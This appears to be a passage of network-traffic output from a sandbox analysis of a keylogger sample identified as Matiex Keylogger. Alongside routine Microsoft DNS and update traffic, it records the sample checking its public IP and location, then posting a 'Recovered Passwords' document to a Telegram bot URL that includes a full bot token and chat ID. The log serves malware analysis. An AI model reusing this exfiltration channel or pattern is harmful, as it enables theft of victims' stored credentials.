204.79.197.203:80http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3Dhttp596 B 2.6kB 4 5
HTTP Request
GET http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3DHTTP Response
200 -
1.0kB 6
-
2.7kB 6.0kB 15 13
-
1.7kB 4.4kB 12 10
-
1.3kB 3.3kB 12 9
-
1.2kB 3.1kB 12 9
-
1.2kB 3.2kB 12 9
-
1.3kB 3.3kB 12 9
-
1.1kB 1.8kB 11 10
HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200 -
1.1kB 7.0kB 12 10
HTTP Request
GET https://freegeoip.app/xml/154.61.71.51HTTP Response
200HTTP Request
GET https://freegeoip.app/xml/154.61.71.51HTTP Response
200HTTP Request
GET https://freegeoip.app/xml/154.61.71.51HTTP Response
200 -
149.154.167.220:443https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5Ctls, httpg6yzl1NROz6FgZi.exe2.0kB 7.3kB 10 12
HTTP Request
POST https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5CHTTP Response
200 -
-
1.4kB 3.7kB 20 20
DNS Request
crl3.digicert.com
DNS Response
93.184.220.29
DNS Request
go.microsoft.com
DNS Response
2.18.105.186
DNS Request
dmd.metaservices.microsoft.com
DNS Response
20.189.118.208
DNS Request
oneocsp.microsoft.com
DNS Response
204.79.197.203
DNS Request
nexusrules.officeapps.live.com
DNS Response
52.109.12.18
DNS Request
config.edge.skype.com
DNS Response
13.107.42.23
DNS Request
tsfe.trafficshaping.dsp.mp.microsoft.com
DNS Response
20.54.110.119
DNS Request
ctldl.windowsupdate.com
DNS Response
95.101.78.8288.221.144.130
DNS Request
login.live.com
DNS Response
20.190.159.13840.126.31.14320.190.159.13420.190.159.13240.126.31.440.126.31.13540.126.31.640.126.31.137
DNS Request
ocsp.digicert.com
DNS Response
93.184.220.29
DNS Request
settings-win.data.microsoft.com
DNS Response
20.73.194.208
DNS Request
slscr.update.microsoft.com
DNS Response
52.242.101.226
DNS Request
fe3cr.delivery.mp.microsoft.com
DNS Response
20.54.89.1552.242.97.97
DNS Request
fe3cr.delivery.mp.microsoft.com
DNS Response
52.152.108.9652.242.97.97
DNS Request
slscr.update.microsoft.com
DNS Response
40.125.122.176
DNS Request
checkip.dyndns.org
DNS Response
158.101.44.242132.226.8.169216.146.43.71132.226.247.73216.146.43.70193.122.6.168193.122.130.0
DNS Request
freegeoip.app
DNS Response
172.67.188.154104.21.19.200
DNS Request
api.telegram.org
DNS Response
149.154.167.220
DNS Request
ctldl.windowsupdate.com
DNS Response
93.184.221.240
DNS Request
fs.microsoft.com
DNS Response
104.81.140.70